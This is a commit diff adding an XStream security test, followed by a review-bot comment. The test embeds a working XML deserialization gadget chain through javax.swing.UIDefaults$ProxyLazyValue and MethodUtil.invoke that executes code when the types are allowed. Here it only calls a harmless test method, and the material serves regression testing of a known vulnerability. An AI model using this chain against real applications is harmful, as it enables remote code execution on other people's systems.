

Add security test for RCE with Swing UIDefaults.
joehni committed May 15, 2024
1 parent 2cf25e6 commit f126811
Showing 1 changed file with 91 additions and 1 deletion.
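--- a/SecurityVulnerabilityTest.java
+++ b/SecurityVulnerabilityTest.java
@@ -1,5 +1,5 @@
 /*
-* Copyright (C) 2013, 2014, 2017, 2018, 2020, 2021, 2022 XStream Committers.
+* Copyright (C) 2013, 2014, 2017, 2018, 2020, 2021, 2022, 2024 XStream Committers.
 * All rights reserved.
 *
 * The software in this package is published under the terms of the BSD
@@ -121,6 +121,96 @@ public void testExplicitlyConvertImageIOContainsFilter() {
 assertEquals("Executed!", BUFFER.toString());
 }
 
+public void testExplicitlyConvertSwingUIDefaults() {
+final String xml = ""
++ "<hashtable>\n"
++ " <entry>\n"
++ " <javax.swing.UIDefaults_-TextAndMnemonicHashMap serialization=\"custom\">\n"
++ " <unserializable-parents/>\n"
++ " <map>\n"
++ " <default>\n"
++ " <loadFactor>1.0</loadFactor>\n"
++ " <threshold>12</threshold>\n"
++ " </default>\n"
++ " <int>16</int>\n"
++ " <int>1</int>\n"
++ " <javax.activation.MimeTypeParameterList>\n"
++ " <parameters class=\"javax.swing.UIDefaults\" serialization=\"custom\">\n"
++ " <unserializable-parents/>\n"
++ " <hashtable>\n"
++ " <default>\n"
++ " <loadFactor>0.75</loadFactor>\n"
++ " <threshold>525</threshold>\n"
++ " </default>\n"
++ " <int>700</int>\n"
++ " <int>1</int>\n"
++ " <string>1</string>\n"
++ " <javax.swing.UIDefaults_-ProxyLazyValue>\n"
++ " <className>sun.reflect.misc.MethodUtil</className>\n"
++ " <methodName>invoke</methodName>\n"
++ " <args>\n"
++ " <method>\n"
++ " <class>sun.reflect.misc.MethodUtil</class>\n"
++ " <name>invoke</name>\n"
++ " <parameter-types>\n"
++ " <class>java.lang.reflect.Method</class>\n"
++ " <class>java.lang.Object</class>\n"
++ " <class>[Ljava.lang.Object;</class>\n"
++ " </parameter-types>\n"
++ " </method>\n"
++ " <object/>\n"
++ " <object-array>\n"
++ " <method>\n"
++ " <class>com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec</class>\n"
++ " <name>exec</name>\n"
++ " <parameter-types/>\n"
++ " </method>\n"
++ " <com.thoughtworks.acceptance.SecurityVulnerabilityTest_-Exec/>\n"
++ " <object-array/>\n"
++ " </object-array>\n"
++ " </args>\n"
++ " </javax.swing.UIDefaults_-ProxyLazyValue>\n"
++ " </hashtable>\n"
++ " <javax.swing.UIDefaults>\n"
++ " <default>\n"
++ " <defaultLocale>zh_CN</defaultLocale>\n"
++ " <resourceCache/>\n"
++ " </default>\n"
++ " </javax.swing.UIDefaults>\n"
++ " </parameters>\n"
++ " </javax.activation.MimeTypeParameterList>\n"
++ " <null/>\n"
++ " </map>\n"
++ " </javax.swing.UIDefaults_-TextAndMnemonicHashMap>\n"
++ " <int>1</int>\n"
++ " </entry>\n"
++ " <entry>\n"
++ " <javax.swing.UIDefaults_-TextAndMnemonicHashMap serialization=\"custom\">\n"
++ " <unserializable-parents/>\n"
++ " <map>\n"
++ " <default>\n"
++ " <loadFactor>1.0</loadFactor>\n"
++ " <threshold>12</threshold>\n"
++ " </default>\n"
++ " <int>16</int>\n"
++ " <int>1</int>\n"
++ " <javax.activation.MimeTypeParameterList reference=\"../../../../entry/javax.swing.UIDefaults_-TextAndMnemonicHashMap/map/javax.activation.MimeTypeParameterList\"/>\n"
++ " <null/>\n"
++ " </map>\n"
++ " </javax.swing.UIDefaults_-TextAndMnemonicHashMap>\n"
++ " <int>1</int>\n"
++ " </entry>\n"
++ "</hashtable>";
+
+xstream.allowTypes(
+"javax.activation.MimeTypeParameterList", "javax.swing.UIDefaults$ProxyLazyValue");
+
+assertEquals(0, BUFFER.length());
+final Hashtable<?,?> hashtable = xstream.fromXML(xml);
+assertEquals("Executed!", BUFFER.toString());
+assertNotNull(hashtable);
+}
+
 public static class Exec {
 
 public void exec() {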
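Review bot: `testExplicitlyConvertSwingUIDefaults` carries no comment stating what it establishes, so a reader sees only a payload that ends in `Exec.exec()` via `javax.swing.UIDefaults$ProxyLazyValue` and has to infer why the two `allowTypes` entries matter. A Javadoc on the method should say that the `BUFFER` assertion proves execution happens only because `javax.activation.MimeTypeParameterList` and `javax.swing.UIDefaults$ProxyLazyValue` were explicitly allowed, i.e. the test documents a gadget chain that the caller's own type permissions enable, which is presumably the intent given the sibling name `testExplicitlyConvertImageIOContainsFilter`. The test also never pins the protective behaviour: unless another test in this file covers it, deserializing the same `xml` before the `allowTypes` call and asserting that it is rejected (XStream's `ForbiddenClassException` under the default type permissions, if that is what this test fixture configures) would turn a demonstration into a regression guard. Minor: `Hashtable<?,?>` would normally be written `Hashtable<?, ?>`; `Exec` continues outside the hunk.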
